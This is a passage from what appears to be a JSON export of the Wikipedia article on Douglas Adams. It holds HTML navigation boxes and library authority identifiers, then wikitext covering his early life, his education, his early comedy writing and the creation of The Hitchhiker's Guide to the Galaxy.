href=\"/wiki/United_Poultry_Concerns\" title=\"United Poultry Concerns\">United Poultry Concerns</a></li>\n<li><b><a href=\"/wiki/List_of_animal_rights_groups\" title=\"List of animal rights groups\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Animal_advocacy_parties\" title=\"Category:Animal advocacy parties\">Parties</a></th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Animal_Alliance_Environment_Voters_Party_of_Canada\" title=\"Animal Alliance Environment Voters Party of Canada\">AAEVP</a> (Canada)</li>\n<li><a href=\"/wiki/Animal_Justice_Party\" title=\"Animal Justice Party\">Animal Justice Party</a> (Australia)</li>\n<li><a href=\"/wiki/Animal_Welfare_Party\" title=\"Animal Welfare Party\">Animal Welfare Party</a> (UK)</li>\n<li><i><a href=\"/wiki/Party_Against_Bullfighting,_Cruelty_and_Mistreatment_of_Animals\" class=\"mw-redirect\" title=\"Party Against Bullfighting, Cruelty and Mistreatment of Animals\">PACMA</a></i> (Spain)</li>\n<li><i><a href=\"/wiki/Party_for_the_Animals\" title=\"Party for the Animals\">Partij voor de Dieren</a></i> (Netherlands)</li>\n<li><i><a href=\"/wiki/Italian_Animal_Welfare_Party\" title=\"Italian Animal Welfare Party\">Partito Animalista Italiano</a></i> (Italy)</li>\n<li><i><a href=\"/wiki/Tierschutzpartei\" class=\"mw-redirect\" title=\"Tierschutzpartei\">Tierschutzpartei</a></i> (Germany)</li>\n<li><b><a href=\"/wiki/List_of_animal_advocacy_parties\" title=\"List of animal advocacy parties\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\">Media</th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Books_about_animal_rights\" title=\"Category:Books about animal rights\">Books</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Animals%27_Rights:_Considered_in_Relation_to_Social_Progress\" title=\"Animals' Rights: Considered in Relation to Social Progress\">Animals' Rights: Considered in Relation to Social Progress</a></i> (1894)</li>\n<li><i><a href=\"/wiki/Animals,_Men_and_Morals\" title=\"Animals, Men and Morals\">Animals, Men and Morals</a></i> (1971)</li>\n<li><i><a href=\"/wiki/Animal_Liberation_(book)\" title=\"Animal Liberation (book)\">Animal Liberation</a></i> (1975)</li>\n<li><i><a href=\"/wiki/The_Case_for_Animal_Rights\" title=\"The Case for Animal Rights\">The Case for Animal Rights</a></i> (1983)</li>\n<li><i><a href=\"/wiki/The_Lives_of_Animals\" title=\"The Lives of Animals\">The Lives of Animals</a></i> (1999)</li>\n<li><i><a href=\"/wiki/Striking_at_the_Roots\" title=\"Striking at the Roots\">Striking at the Roots</a></i> (2008)</li>\n<li><i><a href=\"/wiki/An_American_Trilogy_(book)\" title=\"An American Trilogy (book)\">An American Trilogy</a></i> (2009)</li>\n<li><b><a href=\"/wiki/Category:Books_about_animal_rights\" title=\"Category:Books about animal rights\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Documentary_films_about_animal_rights\" title=\"Category:Documentary films about animal rights\">Films</a></th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Animals_Film\" title=\"The Animals Film\">The Animals Film</a></i> (1981)</li>\n<li><i><a href=\"/wiki/A_Cow_at_My_Table\" title=\"A Cow at My Table\">A Cow at My Table</a></i> (1998)</li>\n<li><i><a href=\"/wiki/Meet_Your_Meat\" title=\"Meet Your Meat\">Meet Your Meat</a></i> (2002)</li>\n<li><i><a href=\"/wiki/Peaceable_Kingdom_(documentary)\" class=\"mw-redirect\" title=\"Peaceable Kingdom (documentary)\">Peaceable Kingdom</a></i> (2004)</li>\n<li><i><a href=\"/wiki/Earthlings_(film)\" title=\"Earthlings (film)\">Earthlings</a></i> (2005)</li>\n<li><i><a href=\"/wiki/Behind_the_Mask_(2006_documentary_film)\" class=\"mw-redirect\" title=\"Behind the Mask (2006 documentary film)\">Behind the Mask</a></i> (2006)</li>\n<li><i><a href=\"/wiki/The_Cove_(film)\" title=\"The Cove (film)\">The Cove</a></i> (2009)</li>\n<li><i><a href=\"/wiki/Forks_Over_Knives\" title=\"Forks Over Knives\">Forks Over Knives</a></i> (2011)</li>\n<li><i><a href=\"/wiki/Vegucated\" title=\"Vegucated\">Vegucated</a> (2011)</i></li>\n<li><i><a href=\"/wiki/Speciesism:_The_Movie\" title=\"Speciesism: The Movie\">Speciesism: The Movie</a></i> (2013)</li>\n<li><i><a href=\"/wiki/The_Ghosts_in_Our_Machine\" title=\"The Ghosts in Our Machine\">The Ghosts in Our Machine</a></i> (2013)</li>\n<li><b><a href=\"/wiki/Category:Documentary_films_about_animal_rights\" title=\"Category:Documentary films about animal rights\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\">Categories</th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Category:Animal_advocacy_parties\" title=\"Category:Animal advocacy parties\">Animal advocacy parties</a></li>\n<li><a href=\"/wiki/Category:Animal_law\" title=\"Category:Animal law\">Animal law</a></li>\n<li><a href=\"/wiki/Category:Animal_Liberation_Front\" title=\"Category:Animal Liberation Front\">Animal Liberation Front</a></li>\n<li><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">Animal rights</a></li>\n<li><a href=\"/wiki/Category:Animal_rights_advocates\" title=\"Category:Animal rights advocates\">Animal rights advocates</a></li>\n<li><a href=\"/wiki/Category:Animal_rights_media\" title=\"Category:Animal rights media\">Animal right media</a></li>\n<li><a href=\"/wiki/Category:Animal_rights_movement\" title=\"Category:Animal rights movement\">Animal rights movement</a></li>\n<li><a href=\"/wiki/Category:Animal_testing\" title=\"Category:Animal testing\">Animal testing</a></li>\n<li><a href=\"/wiki/Category:Blood_sports\" title=\"Category:Blood sports\">Blood sports</a></li>\n<li><a href=\"/wiki/Category:Livestock\" title=\"Category:Livestock\">Livestock</a></li>\n<li><a href=\"/wiki/Category:Meat_industry\" title=\"Category:Meat industry\">Meat industry</a></li>\n<li><a href=\"/wiki/Category:Poultry_farming\" title=\"Category:Poultry farming\">Poultry</a></li>\n<li><a href=\"/wiki/Category:Veganism\" title=\"Category:Veganism\">Veganism</a></li>\n<li><a href=\"/wiki/Category:Vegetarianism\" title=\"Category:Vegetarianism\">Vegetarianism</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<td class=\"navbox-abovebelow\" colspan=\"2\" style=\"text-align: center;\">\n<div><span class=\"metadata\"><a href=\"/wiki/File:Paw_(Animal_Rights_symbol).svg\" class=\"image\"><img alt=\"icon\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/7/71/Paw_%28Animal_Rights_symbol%29.svg/16px-Paw_%28Animal_Rights_symbol%29.svg.png\" width=\"16\" height=\"16\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/7/71/Paw_%28Animal_Rights_symbol%29.svg/24px-Paw_%28Animal_Rights_symbol%29.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/7/71/Paw_%28Animal_Rights_symbol%29.svg/32px-Paw_%28Animal_Rights_symbol%29.svg.png 2x\" data-file-width=\"500\" data-file-height=\"500\" /></a> <a href=\"/wiki/Portal:Animal_rights\" title=\"Portal:Animal rights\">Animal rights portal</a></span></div>\n</td>\n</tr>\n</table>\n</div>\n<div role=\"navigation\" class=\"navbox\" aria-label=\"Navbox\" style=\"padding:3px\">\n<table class=\"nowraplinks hlist navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Help:Authority_control\" title=\"Help:Authority control\">Authority control</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><span style=\"white-space:nowrap;\"><a rel=\"nofollow\" class=\"external text\" href=\"//www.worldcat.org/identities/containsVIAFID/113230702\">WorldCat Identities</a></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Virtual_International_Authority_File\" title=\"Virtual International Authority File\">VIAF</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"https://viaf.org/viaf/113230702\">113230702</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Library_of_Congress_Control_Number\" title=\"Library of Congress Control Number\">LCCN</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://id.loc.gov/authorities/names/n80076765\">n80076765</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/International_Standard_Name_Identifier\" title=\"International Standard Name Identifier\">ISNI</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://isni.org/isni/0000000080456315\">0000 0000 8045 6315</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Integrated_Authority_File\" title=\"Integrated Authority File\">GND</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://d-nb.info/gnd/119033364\">119033364</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/LIBRIS\" title=\"LIBRIS\">SELIBR</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"//libris.kb.se/auth/230807\">230807</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Syst%C3%A8me_universitaire_de_documentation\" title=\"Système universitaire de documentation\">SUDOC</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.idref.fr/026677636\">026677636</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Biblioth%C3%A8que_nationale_de_France\" title=\"Bibliothèque nationale de France\">BNF</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://catalogue.bnf.fr/ark:/12148/cb11888092r\">cb11888092r</a> <a rel=\"nofollow\" class=\"external text\" href=\"http://data.bnf.fr/ark:/12148/cb11888092r\">(data)</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/BIBSYS\" class=\"mw-redirect\" title=\"BIBSYS\">BIBSYS</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://ask.bibsys.no/ask/action/result?cmd=&kilde=biblio&cql=bs.autid+%3D+90196888&feltselect=bs.autid\">90196888</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/MusicBrainz\" title=\"MusicBrainz\">MusicBrainz</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"//musicbrainz.org/artist/e9ed318d-8cc5-4cf8-ab77-505e39ab6ea4\">e9ed318d-8cc5-4cf8-ab77-505e39ab6ea4</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/National_Library_of_Australia\" title=\"National Library of Australia\">NLA</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"//nla.gov.au/anbd.aut-an35163268\">35163268</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/National_Diet_Library\" title=\"National Diet Library\">NDL</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://id.ndl.go.jp/auth/ndlna/00430962\">00430962</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/National_Library_of_the_Czech_Republic\" title=\"National Library of the Czech Republic\">NKC</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://aleph.nkp.cz/F/?func=find-c&local_base=aut&ccl_term=ica=jn19990000029&CON_LNG=ENG\">jn19990000029</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Istituto_Centrale_per_il_Catalogo_Unico\" title=\"Istituto Centrale per il Catalogo Unico\">ICCU</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://opac.sbn.it/opacsbn/opac/iccu/scheda_authority.jsp?bid=IT\\ICCU\\RAVV\\034417\">IT\\ICCU\\RAVV\\034417</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Russian_State_Library\" title=\"Russian State Library\">RLS</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://aleph.rsl.ru/F?func=find-b&find_code=SYS&adjacent=Y&local_base=RSL11&request=000002833&CON_LNG=ENG\">000002833</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Biblioteca_Nacional_de_Espa%C3%B1a\" title=\"Biblioteca Nacional de España\">BNE</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://catalogo.bne.es/uhtbin/authoritybrowse.cgi?action=display&authority_id=XX1149955\">XX1149955</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/CiNii\" title=\"CiNii\">CiNii</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://ci.nii.ac.jp/author/DA07517784?l=en\">DA07517784</a></span></span></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</div>\n\n",
"displaytitle": "Douglas Adams",
"iwlinks": [
{
"prefix": "commons",
"url": "https://commons.wikimedia.org/wiki/Category:Douglas_Adams",
"title": "commons:Category:Douglas Adams"
},
{
"prefix": "wikiquote",
"url": "https://en.wikiquote.org/wiki/Special:Search/Douglas_Adams",
"title": "wikiquote:Special:Search/Douglas Adams"
}
],
"wikitext": "{{other people}}\n{{Use British English|date=October 2013}}\n{{Use dmy dates|date=April 2015}}\n{{Infobox writer <!-- for more information see [[:Template:Infobox writer/doc]] -->\n| name = Douglas Adams\n| image = Douglas adams portrait cropped.jpg\n| caption =\n| birth_name = Douglas Noel Adams\n| birth_date = {{birth date|1952|3|11|df=yes}}\n| birth_place = [[Cambridge]], England\n| height = {{height|ft=6|in=5}}\n| death_date = {{Death date and age|2001|5|11|1952|3|11|df=yes}}\n| death_place = [[Montecito, California]], U.S.\n| resting_place = [[Highgate Cemetery]], London, England\n| alma_mater = [[St John's College, Cambridge]]\n| occupation = Writer\n| genre = Science fiction, comedy, satire\n| movement =\n| website = {{URL|douglasadams.com/}}\n}}\n<!-- Do *not* change spelling of \"Hitchhiker's\"; see talk page for details -->\n<!-- Please do *not* change spelling of \"Noel\". There is no 'ë'. Any citations have themselves been taken from an earlier, incorrect edit of Wikipedia; see talk page for details -->\n'''Douglas Noel Adams''' (11 March 1952 – 11 May 2001) was an [[English people|English]] [[author]], [[scriptwriter]], [[essayist]], [[List of humorists|humourist]], [[satirist]] and [[dramatist]].\n\nAdams is best known as the author of ''[[The Hitchhiker's Guide to the Galaxy]]'', which originated in 1978 as a BBC [[The Hitchhiker's Guide to the Galaxy (radio series)|radio comedy]] before developing into a \"trilogy\" of five books that sold more than 15 million copies in his lifetime and generated a [[The Hitchhiker's Guide to the Galaxy (TV series)|television series]], several stage plays, comics, a [[The Hitchhiker's Guide to the Galaxy (computer game)|computer game]], and in 2005 a [[The Hitchhiker's Guide to the Galaxy (film)|feature film]]. Adams's contribution to UK radio is commemorated in [[Radio Academy|The Radio Academy]]'s Hall of Fame.<ref name=\"radioacad\">{{cite web|title=The Radio Academy Hall of Fame |url=http://www.radioacademy.org/hall-of-fame |work=The Radio Academy |accessdate=8 December 2011 |archiveurl=http://www.webcitation.org/63mNGrql2?url=http%3A%2F%2Fwww.radioacademy.org%2Fhall-of-fame%2F |archivedate=8 December 2011 |deadurl=no |df=dmy }}</ref>\n\nAdams also wrote ''[[Dirk Gently's Holistic Detective Agency]]'' (1987) and ''[[The Long Dark Tea-Time of the Soul]]'' (1988), and co-wrote ''[[The Meaning of Liff]]'' (1983), ''[[The Deeper Meaning of Liff]]'' (1990), ''[[Last Chance to See]]'' (1990), and three stories for the television series ''[[Doctor Who]]''; he also served as [[script editor]] for the show's seventeenth season in 1979. A posthumous collection of his works, including an unfinished novel, was published as ''[[The Salmon of Doubt]]'' in 2002.\n\nAdams was known as an advocate for environmentalism and [[conservation movement|conservation]], as a lover of fast cars, cameras, [[technological innovation]] and the [[Apple Macintosh]], and as a \"devout [[atheist]]\".\n\n==Early life==\n<!-- Please leave this section heading as is, for the chronology of events. Adams's own family (wife and daughter) are discussed later. -->\nAdams was born on 11 March 1952 to Janet (née Donovan; 1927–2016) and Christopher Douglas Adams (1927–1985) in [[Cambridge]], England.<ref name=ODNB >Webb 2005b</ref> The following year, [[James D. Watson|Watson]] and [[Francis Crick|Crick]] famously first modelled [[DNA]] at [[Cambridge University]], leading Adams to later quip he was DNA in Cambridge months earlier. The family moved to [[East End of London|East London]] a few months after his birth, where his sister, Susan, was born three years later.<ref name=Adams_xix>{{Harvnb|Adams|2002|pp=xix}}</ref> His parents divorced in 1957; Douglas, Susan, and their mother moved to an [[RSPCA]] animal shelter in [[Brentwood, Essex]], run by his maternal grandparents.<ref>Webb 2005a, p. 32.</ref>\n\n===Education===\nAdams attended Primrose Hill Primary School in [[Brentwood, Essex|Brentwood]]. At nine, he passed the entrance exam for [[Brentwood School (Essex)|Brentwood School]], an independent school whose alumni include [[Robin Day]], [[Jack Straw]], [[Noel Edmonds]], and [[David Irving]]. [[Griff Rhys Jones]] was a year below him, and he was in the same class as [[Stuckism|Stuckist]] artist [[Charles Thomson (artist)|Charles Thomson]]. He attended the [[Preparatory school (UK)|prep school]] from 1959 to 1964, then the main school until December 1970. His form master, Frank Halford, said of him: \"Hundreds of boys have passed through the school but Douglas Adams really stood out from the crowd — literally. He was unnecessarily tall and in his short trousers he looked a trifle self-conscious.\" \"The form-master wouldn't say 'Meet under the clock tower,' or 'Meet under the war memorial',\" he joked, \"but 'Meet under Adams'.\"<ref name=Adams_7>{{Harvnb|Adams|2002|pp=7}}</ref><ref>Botti, Nicholas. [http://douglasadams.eu/interview-with-frank-halford/ \"Interview with Frank Halford\"]. ''Life, DNA, and H2G2.'' 2009. Web. Retrieved 13 March 2012. (Click on link at bottom for facsimile page from ''Daily News'' article, 7 March 1998.)</ref> Yet it was his ability to write first-class stories that really made him \"shine\".<ref name=Simpson_9>{{Harvnb|Simpson|2003|pp=9}}</ref>\n\nAdams was six feet tall (1.83 m) by age 12 and stopped growing at 6 ft 5 in (1.96 m). He became the only student ever to be awarded a ten out of ten by Halford for creative writing, something he remembered for the rest of his life, particularly when facing [[writer's block]].<ref name=Adams_xix />\n\nSome of his earliest writing was published at the school, such as a report on its photography club in ''The Brentwoodian'' in 1962, or spoof reviews in the school magazine ''Broadsheet'', edited by [[Paul Neil Milne Johnstone]], who later became a character in ''The Hitchhiker's Guide''. He also designed the cover of one issue of the ''Broadsheet'', and had a letter and short story published nationally in ''[[Eagle (comic)|The Eagle]]'', the boys' comic, in 1965. A poem entitled \"A Dissertation on the task of writing a poem on a candle and an account of some of the difficulties thereto pertaining\" written by Adams in January 1970, at the age of 17, was discovered by archivist Stacey Harmer in a cupboard at the school in early 2014. In it, Adams rhymes \"futile\" with \"mute, while\" and \"exhausted\" with \"of course did\".<ref>Flood, Alison (March 2014). [http://www.theguardian.com/books/2014/mar/19/lost-school-poems-douglas-adams-griff-rhys-jones \"Lost poems of Douglas Adams and Griff Rhys Jones found in school cupboard\"], ''The Guardian'', 19 March 2014. Accessed 2 July 2014</ref> On the strength of a bravura essay on religious poetry that discussed [[the Beatles]] and [[William Blake]], he was awarded an [[Exhibition (scholarship)|Exhibition]] in English at [[St John's College, Cambridge]], going up in 1971. He wanted to join the [[Footlights]], an invitation-only student comedy club that has acted as a hothouse for comic talent. He was not elected immediately as he had hoped, and started to write and perform in revues with Will Adams (no relation) and Martin Smith, forming a group called \"Adams-Smith-Adams\", but became a member of the Footlights by 1973.<ref name=Simpson_30-40>{{Harvnb|Simpson|2003|pp=30–40}}</ref> Despite doing very little work—he recalled having completed three essays in three years—he graduated in 1974 with a B.A. in [[English literature]].<ref name=ODNB/>\n\n==Career==\n\n===Writing===\nAfter leaving university Adams moved back to London, determined to break into TV and radio as a writer. An edited version of the ''Footlights Revue'' appeared on [[BBC Two|BBC2]] television in 1974. A version of the Revue performed live in London's [[West End of London|West End]] led to Adams being discovered by [[Monty Python]]'s [[Graham Chapman]]. The two formed a brief writing partnership, earning Adams a writing credit in [[List of Monty Python's Flying Circus episodes#6. Party Political Broadcast|episode 45]] of ''Monty Python'' for a sketch called \"[[Patient Abuse]]\". He is one of only two people outside the original Python members to get a writing credit (the other being [[Neil Innes]]).<ref name=times>{{cite news|title=Terry Jones remembers Douglas Adams, 'the last of the Pythons'|newspaper=The Times|date=10 October 2009}}</ref> The sketch plays on the idea of mind-boggling paper work in an emergency, a joke later incorporated into the [[Vogon]]s' obsession with paperwork. Adams also contributed to a sketch on the album for ''[[Monty Python and the Holy Grail]]''.\n\n[[File:DNA in Monty Python.jpg|thumb|Adams in his first ''[[Monty Python's Flying Circus|Monty Python]]'' appearance, in full surgeon's garb]]\n\nAdams had two brief appearances in the fourth series of ''[[Monty Python's Flying Circus]]''. At the beginning of episode 42, \"The Light Entertainment War\", Adams is in a surgeon's mask (as Dr. Emile Koning, according to on-screen captions), pulling on gloves, while [[Michael Palin]] narrates a sketch that introduces one person after another but never gets started. At the beginning of episode 44, \"Mr. Neutron\", Adams is dressed in a [[List of recurring Monty Python's Flying Circus characters#The Pepperpots|pepper-pot]] outfit and loads a missile onto a cart driven by [[Terry Jones]], who is calling for scrap metal (\"Any old iron...\"). The two episodes were broadcast in November 1974. Adams and Chapman also attempted non-Python projects, including ''[[Out of the Trees]]''.\n\nAt this point Adams's career stalled; his writing style was unsuited to the then-current style of radio and TV comedy.<ref name=ODNB /> To make ends meet he took a series of odd jobs, including as a hospital porter, barn builder, and chicken shed cleaner. He was employed as a bodyguard by a Qatari family, who had made their fortune in oil. Anecdotes about that job included that the family had once ordered one of everything from a hotel's menu, tried all the dishes, and sent out for hamburgers. Another story had to do with a prostitute sent to the floor Adams was guarding one evening. They acknowledged each other as she entered, and an hour later, when she left, she is said to have remarked, \"At least you can read while you're on the job.\"<ref>Webb 2005a, p. 93.</ref>\n\nDuring this time Adams continued to write and submit sketches, though few were accepted. In 1976 his career had a brief improvement when he wrote and performed ''Unpleasantness at Brodie's Close'' at the [[Edinburgh Fringe]] festival. By Christmas work had dried up again, and a depressed Adams moved to live with his mother.<ref name=ODNB /> The lack of writing work hit him hard and low confidence became a feature of Adams's life; \"I have terrible periods of lack of confidence [..] I briefly did therapy, but after a while I realised it was like a farmer complaining about the weather. You can't fix the weather – you just have to get on with it\".<ref name=Adams_prologue>{{Harvnb|Adams|2002|pp=prologue}}</ref>\n\nSome of Adams's early radio work included sketches for ''[[The Burkiss Way]]'' in 1977 and ''[[The News Huddlines]]''.<ref>''Hitchhiker: A Biography of Douglas Adams'' by M. J. Simpson, p87</ref> He also wrote, again with Chapman, 20 February 1977 episode of ''Doctor on the Go'', a sequel to the ''[[Doctor in the House (TV series)|Doctor in the House]]'' television comedy series. After the [[The Hitchhiker's Guide to the Galaxy (radio series)|first radio series of ''The Hitchhiker's Guide'']] became successful, Adams was made a BBC radio producer, working on ''[[Week Ending]]'' and a pantomime called ''[[Black Cinderella Two Goes East]]''.<ref>Roberts, Jem. ''The Clue Bible: The Fully Authorised History of I'm Sorry I Haven't A Clue from Footlights to Mornington Crescent'': London, 2009, p164-5</ref> He left after six months to become the script editor for ''[[Doctor Who]]''.\n\nIn 1979 Adams and [[John Lloyd (producer)|John Lloyd]] wrote scripts for two half-hour episodes of ''[[Doctor Snuggles]]'': \"The Remarkable Fidgety River\" and \"The Great Disappearing Mystery\" (episodes seven and twelve). John Lloyd was also co-author of two episodes from the original ''Hitchhiker'' radio series (\"Fit the Fifth\" and \"Fit the Sixth\", also known as \"Episode Five\" and \"Episode Six\"), as well as ''[[The Meaning of Liff]]'' and ''[[The Deeper Meaning of Liff]]''.\n\n====''The Hitchhiker's Guide to the Galaxy''====\n{{Main article|The Hitchhiker's Guide to the Galaxy}}\n''The Hitchhiker's Guide to the Galaxy'' was a concept for a science-fiction comedy radio series pitched by Adams and radio producer [[Simon Brett]] to [[BBC Radio 4]] in 1977. Adams came up with an outline for a pilot episode, as well as a few other stories (reprinted in [[Neil Gaiman]]'s book ''[[Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion]]'') that could potentially be used in the series.\n[[File:Towelday-Innsbruck.jpg|thumb|upright|[[Towel Day]] 2005 in Innsbruck, Austria, where Adams first had the idea of ''The Hitchhiker's Guide''. In the novels a towel is the most useful thing a space traveller can have. The annual Towel Day (25 May) was first celebrated in 2001, two weeks after Adams's death.]]\n\nAccording to Adams, the idea for the title occurred to him while he lay drunk in a field in [[Innsbruck]], Austria, gazing at the stars. He was carrying a copy of the ''[[Hitch-hiker's Guide to Europe]]'', and it occurred to him that \"somebody ought to write a ''Hitchhiker's Guide to the Galaxy''\". He later said that the constant repetition of this anecdote had obliterated his memory of the actual event.<ref>{{cite book | author=Adams, Douglas| editor= Geoffrey Perkins (ed.), Additional Material by M. J. Simpson|title=[[The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts]] | page = 10 | edition =25th Anniversary | publisher=Pan Books | year=2003 | isbn=0-330-41957-9}}</ref>\n\nDespite the original outline, Adams was said to make up the stories as he wrote. He turned to [[John Lloyd (producer)|John Lloyd]] for help with the final two episodes of [[The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases#The Primary Phase|the first series]]. Lloyd contributed bits from an unpublished science fiction book of his own, called ''GiGax''.<ref>Webb 2005a, p. 120.</ref> Very little of Lloyd's material survived in later adaptations of ''Hitchhiker's'', such as the novels and the TV series. The TV series was based on the first six radio episodes, and sections contributed by Lloyd were largely re-written.\n\n[[BBC Radio 4]] broadcast the first radio series weekly in the UK in March and April 1978. The series was distributed in the United States by [[National Public Radio]]. Following the success of the first series, another episode was recorded and broadcast, which was commonly known as the Christmas Episode. [[The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases#The Secondary Phase|A second series]] of five episodes was broadcast one per night, during the week of 21–25 January 1980.\n\nWhile working on the radio series (and with simultaneous projects such as ''[[The Pirate Planet]]'') Adams developed problems keeping to writing deadlines that only got worse as he published novels. Adams was never a prolific writer and usually had to be forced by others to do any writing. This included being locked in a hotel suite with his editor for three weeks to ensure that ''[[So Long, and Thanks for All the Fish]]'' was completed.<ref>Felch 2004</ref> He was quoted as saying, \"I love deadlines. I love the whooshing noise they make as they go by.\"<ref name=Simpson_236>{{Harvnb|Simpson|2003|pp=236}}</ref> Despite the difficulty with deadlines, Adams wrote five novels in the series, published in 1979, 1980, 1982, 1984, and 1992.\n\nThe books formed the basis for other adaptations, such as three-part comic book adaptations for each of the first three books, an interactive text-adventure [[The Hitchhiker's Guide to the Galaxy (computer game)|computer game]], and a photo-illustrated edition, published in 1994. This latter edition featured a [[42 Puzzle]] designed by Adams, which was later incorporated into paperback covers of the first four ''Hitchhiker's'' novels (the paperback for the fifth re-used the artwork from the hardback edition).<ref>[http://www.iblist.com/series.php?id=2 Internet Book List] page, with links to all five novels, and reproductions of the 1990s paperback covers that included the [[42 Puzzle]].</ref>\n\nIn 1980 Adams also began attempts to turn the first ''Hitchhiker's'' novel into a movie, making several trips to Los Angeles, and working with a number of Hollywood studios and potential producers. The next year, the radio series became the basis for a BBC television mini-series<ref>{{citation|url=http://www.imdb.com/title/tt0081874/|title=''The Hitch Hiker's Guide to the Galaxy''|publisher=Internet Movie Database}}</ref> broadcast in six parts. When he died in 2001 in California, he had been trying again to get the movie project started with [[Disney]], which had bought the rights in 1998. The screenplay finally got a posthumous re-write by [[Karey Kirkpatrick]], and [[The Hitchhiker's Guide to the Galaxy (film)|the resulting film]] was released in 2005.\n\nRadio producer [[Dirk Maggs]] had consulted with Adams, first in 1993, and later in 1997 and 2000 about creating a third radio series, based on the third novel in the ''Hitchhiker's'' series.<ref>{{cite book | author=Adams, Douglas. | editor = [[Dirk Maggs]], dramatisations and editor | title=The Hitchhiker's Guide to the Galaxy Radio Scripts: The Tertiary, Quandary and Quintessential Phases | publisher=Pan Books | year=2005|isbn=0-330-43510-8 |pages=xiv | nopp=true}}</ref> They also discussed the possibilities of radio adaptations of the final two novels in the five-book \"trilogy\". As with the movie, this project was only realised after Adams's death. The third series, ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The 